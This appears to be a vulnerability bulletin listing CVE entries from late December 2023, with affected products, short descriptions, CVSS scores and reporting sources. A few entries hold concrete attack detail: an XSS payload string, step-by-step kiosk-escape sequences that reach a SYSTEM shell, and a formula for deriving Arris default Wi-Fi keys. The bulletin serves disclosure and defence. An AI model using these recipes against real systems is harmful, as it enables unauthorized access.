honor — magic_ui Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause information leak. 2023-12-29 2.9 CVE-2023-51433
3836d913-7555-4dd0-a509-f5667fdf5fe4
mattermost — mattermost Mattermost version 8.1.6 and earlier fails to sanitize channel mention data in posts, which allows an attacker to inject markup in the web client. 2023-12-29 3.7 CVE-2023-7113
responsibledisclosure@mattermost.com
myaac — myaac A vulnerability was found in slawkens MyAAC up to 0.8.13. It has been declared as problematic. This vulnerability affects unknown code of the file system/pages/bugtracker.php. The manipulation of the argument bug[2][‘subject’]/bug[2][‘text’]/report[‘subject’] leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.8.14 is able to address this issue. The name of the patch is 83a91ec540072d319dd338abff45f8d5ebf48190. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248848. 2023-12-22 3.5 CVE-2023-7076
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nautobot — nautobot Nautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. When submitting a Job to run via a Job Button, only the model-level `extras.run_job` permission is checked (i.e., does the user have permission to run Jobs in general). Object-level permissions (i.e., does the user have permission to run this specific Job?) are not enforced by the URL/view used in this case. A user with permissions to run even a single Job can actually run all configured JobButton Jobs. Fix will be available in Nautobot 1.6.8 and 2.1.0. 2023-12-22 3.5 CVE-2023-51649
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nextcloud — nextcloud/cloud Nextcloud/Cloud is a calendar app for Nextcloud. An attacker can gain access to stacktrace and internal paths of the server when generating an exception while editing a calendar appointment. It is recommended that the Nextcloud Calendar app is upgraded to 4.5.3. 2023-12-22 3.5 CVE-2023-48308
security-advisories@github.com
security-advisories@github.com
novel-plus — novel-plus A vulnerability classified as problematic has been found in Novel-Plus up to 4.2.0. This affects an unknown part of the file /user/updateUserInfo of the component HTTP POST Request Handler. The manipulation of the argument nickName leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is c62da9bb3a9b3603014d0edb436146512631100d. It is recommended to apply a patch to fix this issue. The identifier VDB-249201 was assigned to this vulnerability. 2023-12-29 3.5 CVE-2023-7166
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
novel-plus — novel-plus A vulnerability was found in Novel-Plus up to 4.2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file novel-admin/src/main/java/com/java2nb/novel/controller/FriendLinkController.java of the component Friendly Link Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The patch is named d6093d8182362422370d7eaf6c53afde9ee45215. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-249307. 2023-12-29 2.4 CVE-2023-7171
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). Allows you to edit the Web Console user notification options. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 3 CVE-2023-41813
security@pandorafms.com
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). Through an HTML payload (iframe tag) it is possible to carry out XSS attacks when the user receiving the messages opens their notifications. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 3.7 CVE-2023-41814
security@pandorafms.com
poly — multiple_products A vulnerability classified as problematic has been found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. This affects an unknown part of the component Web Configuration Application. The manipulation leads to insufficiently random values. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249255. 2023-12-29 3.7 CVE-2023-4462
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
poly — multiple_products A vulnerability, which was classified as problematic, was found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. Affected is an unknown function of the component Configuration File Import. The manipulation of the argument device.auth.localAdminPassword leads to unverified password change. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249258 is the identifier assigned to this vulnerability. 2023-12-29 2.7 CVE-2023-4465
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
poly — multiple_products A vulnerability has been found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Web Interface. The manipulation leads to protection mechanism failure. The attack can be launched remotely. The vendor explains that they do not regard this as a vulnerability as this is a feature that they offer to their customers who have a variety of environmental needs that are met through different firmware builds. To avoid potential roll-back attacks, they remove vulnerable builds from the public servers as a remediation effort. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249259. 2023-12-29 2.7 CVE-2023-4466
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — engineers_online_portal A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Add Engineer Handler. The manipulation of the argument first name/last name with the input <script>alert(0)</script> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249182 is the identifier assigned to this vulnerability. 2023-12-29 2.4 CVE-2023-7160
cna@vuldb.com
cna@vuldb.com
w3c — online-spellchecker-py A vulnerability was found in w3c online-spellchecker-py up to 20140130. It has been rated as problematic. This issue affects some unknown processing of the file spellchecker. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of the patch is d6c21fd8187c5db2a50425ff80694149e75d722e. It is recommended to apply a patch to fix this issue. The identifier VDB-248849 was assigned to this vulnerability. 2023-12-23 3.1 CVE-2014-125108
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
winter_cms — winter_cms Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4. 2023-12-29 3.3 CVE-2023-52085
security-advisories@github.com
security-advisories@github.com
winter_cms — winter_cms Winter is a free, open-source content management system. Prior to 1.2.4, users with the `media.manage_media` permission can upload files to the Media Manager and rename them after uploading. Previously, media manager files were only sanitized on upload, not on renaming, which could have allowed a stored XSS attack. This issue has been patched in v1.2.4. 2023-12-28 2 CVE-2023-52083
security-advisories@github.com
security-advisories@github.com
winter_cms — winter_cms Winter is a free, open-source content management system. Prior to 1.2.4, users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be rendered unescaped in the backend form, potentially allowing for a stored XSS attack. This issue has been patched in v1.2.4. 2023-12-28 2 CVE-2023-52084
security-advisories@github.com
security-advisories@github.com
wordpress — wordpress A vulnerability was found in PlusCaptcha Plugin up to 2.0.6 on WordPress and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.14 is able to address this issue. The patch is identified as 1274afc635170daafd38306487b6bb8a01f78ecd. It is recommended to upgrade the affected component. VDB-248954 is the identifier assigned to this vulnerability. 2023-12-26 3.5 CVE-2015-10127
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
wordpress — wordpress Missing Authorization vulnerability in Anders Thorborg. This issue affects Anders Thorborg: from n/a through 1.4.12. 2023-12-29 3.1 CVE-2023-22676
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in SolidWP Solid Security – Password, Two Factor Authentication, and Brute Force Protection. This issue affects Solid Security – Password, Two Factor Authentication, and Brute Force Protection: from n/a through 8.1.4. 2023-12-29 3.7 CVE-2023-28786
audit@patchstack.com

Severity Not Yet Assigned

Primary Vendor — Product Description Published CVSS Score Source & Patch Info
3cx — 3cx The CRM Integration in 3CX before 18.0.9.23 and 20 before 20.0.0.1494 allows SQL Injection via a first name, search string, or email address. 2023-12-25 not yet calculated CVE-2023-49954
cve@mitre.org
alfasado_inc. — powercms PowerCMS (6 Series, 5 Series, and 4 Series) contains a stored cross-site scripting vulnerability. If this vulnerability is exploited, an arbitrary script may be executed on a logged-in user’s web browser. Note that all versions of PowerCMS 3 Series and earlier which are unsupported (End-of-Life, EOL) are also affected by this vulnerability. 2023-12-26 not yet calculated CVE-2023-49117
vultures@jpcert.or.jp
alfasado_inc. — powercms Open redirect vulnerability in PowerCMS (6 Series, 5 Series, and 4 Series) allows a remote unauthenticated attacker to redirect users to arbitrary web sites via a specially crafted URL. Note that all versions of PowerCMS 3 Series and earlier which are unsupported (End-of-Life, EOL) are also affected by this vulnerability. 2023-12-26 not yet calculated CVE-2023-50297
vultures@jpcert.or.jp
apache — dolphinscheduler Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server. This issue affects Apache DolphinScheduler: until 3.1.9. Users are recommended to upgrade to version 3.1.9, which fixes the issue. 2023-12-30 not yet calculated CVE-2023-49299
security@apache.org
apache — ofbiz Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue. 2023-12-26 not yet calculated CVE-2023-50968
security@apache.org
apache — ofbiz The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF) 2023-12-26 not yet calculated CVE-2023-51467
security@apache.org
apache — openoffice Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose. Links can be activated by clicks, or by automatic document events. The execution of such links must be subject to user approval. In the affected versions of OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution. This is a corner case of CVE-2022-47502. 2023-12-29 not yet calculated CVE-2023-47804
security@apache.org
array — arrayos_ag MotionPro in Array ArrayOS AG before 9.4.0.505 on AG and vxAG allows remote command execution via crafted packets. AG and vxAG 9.3.0.259.x are unaffected. 2023-12-22 not yet calculated CVE-2023-51707
cve@mitre.org
arris_solutions,_inc. — dg860a/dg1670a Arris DG860A and DG1670A devices have predictable default WPA2 PSKs that could lead to unauthorized remote access. (They use the first 6 characters of the SSID and the last 6 characters of the BSSID, decrementing the last digit.) 2023-12-27 not yet calculated CVE-2023-40038
cve@mitre.org
artistscope — artisbrowser An issue in ArtistScope ArtisBrowser v.34.1.5 and before allows an attacker to bypass intended access restrictions via interaction with the com.artis.browser.IntentReceiverActivity component. 2023-12-27 not yet calculated CVE-2023-49000
cve@mitre.org
asp.net_zero — asp.net_zero An open redirect through HTML injection in user messages in Asp.Net Zero before 12.3.0 allows remote attackers to redirect targeted victims to any URL via the ‘<meta http-equiv="refresh"’ in the WebSocket messages. 2023-12-26 not yet calculated CVE-2023-48003
cve@mitre.org
barracuda_networks_inc. — barracuda_esg_appliance Use of a Third Party library produced a vulnerability in Barracuda Networks Inc. Barracuda ESG Appliance which allowed Parameter Injection. This issue affected Barracuda ESG Appliance, from 5.1.3.001 through 9.2.1.001, until Barracuda removed the vulnerable logic. 2023-12-24 not yet calculated CVE-2023-7102
mandiant-cve@google.com
bees_blog — bees_blog The beesblog (aka Bees Blog) component before 1.6.2 for thirty bees allows Reflected XSS because controllers/front/post.php sharing_url is mishandled. 2023-12-30 not yet calculated CVE-2023-52264
cve@mitre.org
bentley_systems — assetwise_integrity_information_server Bentley eB System Management Console applications within Assetwise Integrity Information Server allow an unauthenticated user to view configuration options via a crafted request, leading to information disclosure. This affects eB System management Console before 23.00.02.03 and Assetwise ALIM For Transportation before 23.00.01.25. 2023-12-22 not yet calculated CVE-2023-51708
cve@mitre.org
beyondtrust_corporation — privilege_management_for_windows The Challenge Response feature of BeyondTrust Privilege Management for Windows (PMfW) before 2023-07-14 allows local administrators to bypass this feature by decrypting the shared key, or by locating the decrypted shared key in process memory. The threat is mitigated by the Agent Protection feature. 2023-12-25 not yet calculated CVE-2023-49944
cve@mitre.org
brave_browser — brave_browser Brave Browser before 1.59.40 does not properly restrict the schema for WebUI factory and redirect. This is related to browser/brave_content_browser_client.cc and browser/ui/webui/brave_web_ui_controller_factory.cc. 2023-12-30 not yet calculated CVE-2023-52263
cve@mitre.org
brother_industries,_ltd. — iprint&scan_desktop_for_windows Improper link resolution before file access (‘Link Following’) issue exists in iPrint&Scan Desktop for Windows versions 11.0.0 and earlier. A symlink attack by a malicious user may cause a Denial-of-service (DoS) condition on the PC. 2023-12-26 not yet calculated CVE-2023-51654
vultures@jpcert.or.jp
buffalo_inc. — vr-s1000 VR-S1000 firmware Ver. 2.37 and earlier allows an attacker with access to the product’s web management page to execute arbitrary OS commands. 2023-12-26 not yet calculated CVE-2023-45741
vultures@jpcert.or.jp
buffalo_inc. — vr-s1000 Improper neutralization of argument delimiters in a command (‘Argument Injection’) vulnerability in VR-S1000 firmware Ver. 2.37 and earlier allows an authenticated attacker who can access the product’s command line interface to execute an arbitrary command. 2023-12-26 not yet calculated CVE-2023-46681
vultures@jpcert.or.jp
buffalo_inc. — vr-s1000 VR-S1000 firmware Ver. 2.37 and earlier uses a hard-coded cryptographic key which may allow an attacker to analyze the password of a specific product user. 2023-12-26 not yet calculated CVE-2023-46711
vultures@jpcert.or.jp
buffalo_inc. — vr-s1000 VR-S1000 firmware Ver. 2.37 and earlier allows a network-adjacent unauthenticated attacker who can access the product’s web management page to obtain sensitive information. 2023-12-26 not yet calculated CVE-2023-51363
vultures@jpcert.or.jp
buildkite — elastic_ci_for_aws A symbolic link following vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to change ownership of arbitrary directories via the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script. 2023-12-22 not yet calculated CVE-2023-43116
cve@mitre.org
buildkite — elastic_ci_for_aws A time-of-check-time-of-use race condition vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to bypass a symbolic link check for the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script. 2023-12-22 not yet calculated CVE-2023-43741
cve@mitre.org
com.sdjictec.qdmetro — com.sdjictec.qdmetro An issue in the export component AdSdkH5Activity of com.sdjictec.qdmetro v4.2.2 allows attackers to open a crafted URL without any filtering or checking. 2023-12-28 not yet calculated CVE-2023-51010
cve@mitre.org
documize_inc. — documize SQL Injection vulnerability in Documize version 5.4.2 allows remote attackers to execute arbitrary code via the user parameter of the /api/dashboard/activity endpoint. 2023-12-29 not yet calculated CVE-2023-23634
cve@mitre.org
easy-rules-mvel — easy-rules-mvel easy-rules-mvel v4.1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component MVELRule. 2023-12-29 not yet calculated CVE-2023-50571
cve@mitre.org
exim — exim Exim before 4.97.1 allows SMTP smuggling in certain PIPELINING/CHUNKING configurations. Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because Exim supports <LF>.<CR><LF> but some other popular e-mail servers do not. 2023-12-24 not yet calculated CVE-2023-51766
cve@mitre.org
filerun — filerun FileRun 20220519 allows SQL Injection via the “dir” parameter in a /?module=users&section=cpanel&page=list request. 2023-12-22 not yet calculated CVE-2022-47532
cve@mitre.org
flask-security-too — flask-security-too An open redirect vulnerability in the python package Flask-Security-Too <=5.3.2 allows attackers to redirect unsuspecting users to malicious sites via a crafted URL by abusing the ?next parameter on the /login and /register routes. 2023-12-26 not yet calculated CVE-2023-49438
cve@mitre.org
follet_learning_solutions — destiny_suite A Cross Site Scripting (XSS) vulnerability exists in Follet Learning Solutions Destiny through 20.0_1U. via the handlewpesearchform.do. searchString. 2023-12-25 not yet calculated CVE-2023-38826
cve@mitre.org
fortanix — enclaveos_confidential_computing_manager An issue was discovered in Fortanix EnclaveOS Confidential Computing Manager (CCM) Platform before 3.32 for Intel SGX. Lack of pointer-alignment validation logic in entry functions allows a local attacker to access unauthorized information. This relates to the enclave_ecall function and system call layer. 2023-12-30 not yet calculated CVE-2023-38021
cve@mitre.org
fortanix — enclaveos_confidential_computing_manager An issue was discovered in Fortanix EnclaveOS Confidential Computing Manager (CCM) Platform before 3.29 for Intel SGX. Insufficient pointer validation allows a local attacker to access unauthorized information. This relates to strlen and sgx_is_within_user. 2023-12-30 not yet calculated CVE-2023-38022
cve@mitre.org
free5gc — free5gc An issue in free5GC version 3.3.0 allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on the AMF component via a crafted NGAP message. 2023-12-22 not yet calculated CVE-2023-49391
cve@mitre.org
gl.inet — multiple_products Shell Injection vulnerability in GL.iNet A1300 v4.4.6, AX1800 v4.4.6, AXT1800 v4.4.6, MT3000 v4.4.6, MT2500 v4.4.6, MT6000 v4.5.0, MT1300 v4.3.7, MT300N-V2 v4.3.7, AR750S v4.3.7, AR750 v4.3.7, AR300M v4.3.7, and B1300 v4.3.7 allows local attackers to execute arbitrary code via the get_system_log and get_crash_log functions of the logread module, as well as the upgrade_online function of the upgrade module. 2023-12-28 not yet calculated CVE-2023-50445
cve@mitre.org
grupo_embras — geosiap_erp Grupo Embras GEOSIAP ERP v2.2.167.02 was discovered to contain a SQL injection vulnerability via the codLogin parameter on the login page. 2023-12-30 not yet calculated CVE-2023-50589
cve@mitre.org
hutool-core — hutool-core hutool-core v5.8.23 was discovered to contain an infinite loop in the StrSplitter.splitByRegex function. This vulnerability allows attackers to cause a Denial of Service (DoS) via manipulation of the first two parameters. 2023-12-27 not yet calculated CVE-2023-51075
cve@mitre.org
hutool-core — hutool-core The NumberUtil.toBigDecimal method in hutool-core v5.8.23 was discovered to contain a stack overflow. 2023-12-27 not yet calculated CVE-2023-51080
cve@mitre.org
hyavijava — hyavijava hyavijava v6.0.07.1 was discovered to contain a stack overflow via the ResultConverter.convert2Xml method. 2023-12-27 not yet calculated CVE-2023-51084
cve@mitre.org
idurar-erp-crm — idurar-erp-crm IDURAR (aka idurar-erp-crm) through 2.0.1 allows stored XSS via a PATCH request with a crafted JSON email template in the /api/email/update data. 2023-12-30 not yet calculated CVE-2023-52265
cve@mitre.org
ilias_e-learning — ilias_e-learning The workflow-engine of ILIAS before 7.23 and 8 before 8.3 allows remote authenticated users to run arbitrary system commands on the application server as the application user via a malicious BPMN2 workflow definition file. 2023-12-25 not yet calculated CVE-2023-36485
cve@mitre.org
ilias_e-learning — ilias_e-learning The workflow-engine of ILIAS before 7.23 and 8 before 8.3 allows remote authenticated users to run arbitrary system commands on the application server as the application user by uploading a workflow definition file with a malicious filename. 2023-12-25 not yet calculated CVE-2023-36486
cve@mitre.org
indi_browser/kvbrowser — indi_browser/kvbrowser An issue in Indi Browser (aka kvbrowser) v.12.11.23 allows an attacker to bypass intended access restrictions via interaction with the com.example.gurry.kvbrowswer.webview component. 2023-12-27 not yet calculated CVE-2023-49001
cve@mitre.org
ipaddressbitsdivision — ipaddressbitsdivision An issue in the component IPAddressBitsDivision of IPAddress v5.1.0 leads to an infinite loop. 2023-12-29 not yet calculated CVE-2023-50570
cve@mitre.org
jamf_pro_server — jamf_pro_server There is broken access control during authentication in Jamf Pro Server before 10.46.1. 2023-12-25 not yet calculated CVE-2023-31224
cve@mitre.org
jeecgboot — jeecgboot SQL injection vulnerability in jeecg-boot version 3.5.3 allows remote attackers to escalate privileges and obtain sensitive information via the jmreport/qurestSql component. 2023-12-30 not yet calculated CVE-2023-41542
cve@mitre.org
jeecgboot — jeecgboot SQL injection vulnerability in jeecg-boot v3.5.3 allows remote attackers to escalate privileges and obtain sensitive information via the component /sys/replicate/check. 2023-12-30 not yet calculated CVE-2023-41543
cve@mitre.org
jeecgboot — jeecgboot SSTI injection vulnerability in jeecg-boot version 3.5.3 allows remote attackers to execute arbitrary code via a crafted HTTP request to the /jmreport/loadTableData component. 2023-12-30 not yet calculated CVE-2023-41544
cve@mitre.org
jizhicms — jizhicms File Upload vulnerability in JIZHICMS v.2.5 allows a remote attacker to execute arbitrary code via a crafted file uploaded and downloaded to the download_url parameter in the app/admin/exts/ directory. 2023-12-28 not yet calculated CVE-2023-50692
cve@mitre.org
jline-groovy — jline-groovy An issue in the component GroovyEngine.execute of jline-groovy v3.24.1 allows attackers to cause an OOM (OutofMemory) error. 2023-12-29 not yet calculated CVE-2023-50572
cve@mitre.org
json-path — json-path json-path v2.8.0 was discovered to contain a stack overflow via the Criteria.parse() method. 2023-12-27 not yet calculated CVE-2023-51074
cve@mitre.org
kami_vision — yi_iot The Kami Vision YI IoT com.yunyi.smartcamera application through 4.1.9_20231127 for Android allows a remote attacker to execute arbitrary JavaScript code via an implicit intent to the com.ants360.yicamera.activity.WebViewActivity component. 2023-12-27 not yet calculated CVE-2023-47882
cve@mitre.org
kantega_sso — kantega_saml The Kantega SAML SSO OIDC Kerberos Single Sign-on apps before 6.20.0 for Atlassian products allow XSS if SAML POST Binding is enabled. This affects 4.4.2 through 4.14.8 before 4.14.9, 5.0.0 through 5.11.4 before 5.11.5, and 6.0.0 through 6.19.0 before 6.20.0. The full product names are Kantega SAML SSO OIDC Kerberos Single Sign-on for Jira Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Confluence Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Bitbucket Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Bamboo Data Center & Server (Kantega SSO Enterprise), and Kantega SAML SSO OIDC Kerberos Single Sign-on for FeCru Server (Kantega SSO Enterprise). (Here, FeCru refers to the Atlassian Fisheye and Crucible products running together.) 2023-12-29 not yet calculated CVE-2023-52240
cve@mitre.org
layui — layui layui up to v2.74 was discovered to contain a cross-site scripting (XSS) vulnerability via the data-content parameter. 2023-12-30 not yet calculated CVE-2023-50550
cve@mitre.org
little_backup_box — little_backup_box outdoorbits little-backup-box (aka Little Backup Box) before f39f91c allows remote attackers to execute arbitrary code because the PHP extract function is used for untrusted input. 2023-12-30 not yet calculated CVE-2023-52262
cve@mitre.org
logobee — logobee LogoBee 0.2 allows updates.php?id= XSS. 2023-12-30 not yet calculated CVE-2023-52257
cve@mitre.org
microhttpserver — microhttpserver In MicroHttpServer (aka Micro HTTP Server) through a8ab029, _ParseHeader in lib/server.c allows a one-byte recv buffer overflow via a long URI. 2023-12-25 not yet calculated CVE-2023-51771
cve@mitre.org
mingsoft — mcms Mingsoft MCMS v5.2.9 was discovered to contain a SQL injection vulnerability via the categoryType parameter at /content/list.do. 2023-12-30 not yet calculated CVE-2023-50578
cve@mitre.org
multiple_vendors — multiple_products Matrix SSL 4.x through 4.6.0 and Rambus TLS Toolkit have a length-subtraction integer overflow for Client Hello Pre-Shared Key extension parsing in the TLS 1.3 server. An attacked device calculates an SHA-2 hash over at least 65 KB (in RAM). With a large number of crafted TLS messages, the CPU becomes heavily loaded. This occurs in tls13VerifyBinder and tls13TranscriptHashUpdate. 2023-12-22 not yet calculated CVE-2023-24609
cve@mitre.org
mupdf — mupdf A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in function fz_new_pixmap_from_float_data() of pixmap.c. 2023-12-26 not yet calculated CVE-2023-51103
cve@mitre.org
mupdf — mupdf A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in function pnm_binary_read_image() of load-pnm.c line 527. 2023-12-26 not yet calculated CVE-2023-51104
cve@mitre.org
mupdf — mupdf A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in function bmp_decompress_rle4() of load-bmp.c. 2023-12-26 not yet calculated CVE-2023-51105
cve@mitre.org
mupdf — mupdf A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in function pnm_binary_read_image() of load-pnm.c. 2023-12-26 not yet calculated CVE-2023-51106
cve@mitre.org
mupdf — mupdf A floating point exception (divide-by-zero) vulnerability was discovered in mupdf 1.23.4 in function compute_color() of jquant2.c. 2023-12-26 not yet calculated CVE-2023-51107
cve@mitre.org
mupnp_for_c — mupnp_for_c mupnp/net/uri.c in mUPnP for C through 3.0.2 has an out-of-bounds read and application crash because it lacks a certain host length recalculation. 2023-12-28 not yet calculated CVE-2023-52152
cve@mitre.org
mvel2 — mvel2 A TimeOut error exists in the ParseTools.subCompileExpression method in mvel2 v2.5.0 Final. 2023-12-27 not yet calculated CVE-2023-51079
cve@mitre.org
ncp_engineering_inc. — secure_enterprise_client Support Assistant in NCP Secure Enterprise Client before 13.10 allows attackers to execute DLL files with SYSTEM privileges by creating a symbolic link from a %LOCALAPPDATA%\Temp\NcpSupport* location. 2023-12-25 not yet calculated CVE-2023-28872
cve@mitre.org
nokia — nfm-t_r19.9 In NOKIA NFM-T R19.9, an OS Command Injection vulnerability occurs in /cgi-bin/R19.9/log.pl of the VM Manager WebUI via the cmd HTTP GET parameter. This allows authenticated users to execute commands, with root privileges, on the operating system. 2023-12-25 not yet calculated CVE-2022-39818
cve@mitre.org
nokia — nfm-t_r19.9 In Network Element Manager in NOKIA NFM-T R19.9, an Unprotected Storage of Credentials vulnerability occurs under /root/RestUploadManager.xml.DRC and /DEPOT/KECustom_199/OTNE_DRC/RestUploadManager.xml. A remote user, authenticated to the operating system, with access privileges to the directory /root or /DEPOT, is able to read cleartext credentials to access the web portal NFM-T and control all the PPS Network elements. 2023-12-25 not yet calculated CVE-2022-39820
cve@mitre.org
nokia — nfm-t_r19.9 In NOKIA NFM-T R19.9, a SQL Injection vulnerability occurs in /cgi-bin/R19.9/easy1350.pl of the VM Manager WebUI via the id or host HTTP GET parameter. An authenticated attacker is required for exploitation. 2023-12-25 not yet calculated CVE-2022-39822
cve@mitre.org
nokia — nfm-t_r19.9 An issue was discovered in NOKIA NFM-T R19.9. Relative Path Traversal can occur under /oms1350/data/cpb/log of the Network Element Manager via the filename parameter, allowing a remote authenticated attacker to read arbitrary files. 2023-12-25 not yet calculated CVE-2022-41760
cve@mitre.org
nokia — nfm-t_r19.9 An issue was discovered in NOKIA NFM-T R19.9. An Absolute Path Traversal vulnerability exists under /cgi-bin/R19.9/viewlog.pl of the VM Manager WebUI via the logfile parameter, allowing a remote authenticated attacker to read arbitrary files. 2023-12-25 not yet calculated CVE-2022-41761
cve@mitre.org
nokia — nfm-t_r19.9 An issue was discovered in NOKIA NFM-T R19.9. Multiple Reflected XSS vulnerabilities exist in the Network Element Manager via any parameter to log.pl, the bench or pid parameter to top.pl, or the id parameter to easy1350.pl. 2023-12-25 not yet calculated CVE-2022-41762
cve@mitre.org
nokia — nfm-t_r19.9 An issue was discovered in NOKIA NFM-T R19.9. Reflected XSS in the Network Element Manager exists via /oms1350/pages/otn/cpbLogDisplay via the filename parameter, under /oms1350/pages/otn/connection/E2ERoutingDisplayWithOverLay via the id parameter, and under /oms1350/pages/otn/mainOtn via all parameters. 2023-12-25 not yet calculated CVE-2022-43675
cve@mitre.org
ocpp-jaxb — ocpp-jaxb SteVe Community ocpp-jaxb before 0.0.8 generates invalid timestamps such as ones with month 00 in certain situations (such as when an application receives a StartTransaction Open Charge Point Protocol message with a timestamp parameter of 1000000). This may lead to a SQL exception in applications and may undermine the integrity of transaction records. 2023-12-26 not yet calculated CVE-2023-52096
cve@mitre.org
one_identity — password_manager One Identity Password Manager before 5.13.1 allows Kiosk Escape. This product enables users to reset their Active Directory passwords on the login screen of a Windows client. It launches a Chromium based browser in Kiosk mode to provide the reset functionality. The escape sequence is: go to the Google ReCAPTCHA section, click on the Privacy link, observe that there is a new browser window, navigate to any website that offers file upload, navigate to cmd.exe from the file explorer window, and launch cmd.exe as NT AUTHORITY\SYSTEM. 2023-12-25 not yet calculated CVE-2023-48654
cve@mitre.org
one_identity — password_manager One Identity Password Manager before 5.13.1 allows Kiosk Escape. This product enables users to reset their Active Directory passwords on the login screen of a Windows client. It launches a Chromium based browser in Kiosk mode to provide the reset functionality. The escape sequence is: wait for a session timeout, click on the Help icon, observe that there is a browser window for the One Identity website, navigate to any website that offers file upload, navigate to cmd.exe from the file explorer window, and launch cmd.exe as NT AUTHORITY\SYSTEM. 2023-12-25 not yet calculated CVE-2023-51772
cve@mitre.org
opencrx — opencrx openCRX 5.2.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name field after creation of a Tracker in Manage Activity. 2023-12-26 not yet calculated CVE-2023-27150
cve@mitre.org
opennds — opennds OpenNDS, as used in Sierra Wireless ALEOS before 4.17.0.12 and other products, allows remote attackers to cause a denial of service (NULL pointer dereference, daemon crash, and Captive Portal outage) via a GET request to /opennds_auth/ that lacks a custom query string parameter and client-token. 2023-12-25 not yet calculated CVE-2023-38321
cve@mitre.org
openssh — openssh OpenSSH through 9.6, when common types of DRAM are used, might allow row hammer attacks (for authentication bypass) because the integer value of authenticated in mm_answer_authpassword does not resist flips of a single bit. NOTE: this is applicable to a certain threat model of attacker-victim co-location in which the attacker has user privileges. 2023-12-24 not yet calculated CVE-2023-51767
cve@mitre.org
passwork — passwork Passwork before 6.2.0 allows remote authenticated users to bypass 2FA by sending all one million of the possible 6-digit codes. 2023-12-26 not yet calculated CVE-2023-49949
cve@mitre.org
peplink — balance_two An issue was discovered in Peplink Balance Two before 8.4.0. Command injection in the traceroute feature of the administration console allows users with admin privileges to execute arbitrary commands as root. 2023-12-25 not yet calculated CVE-2023-49226
cve@mitre.org
peplink — balance_two An issue was discovered in Peplink Balance Two before 8.4.0. Console port authentication uses hard-coded credentials, which allows an attacker with physical access and sufficient knowledge to execute arbitrary commands as root. 2023-12-28 not yet calculated CVE-2023-49228
cve@mitre.org
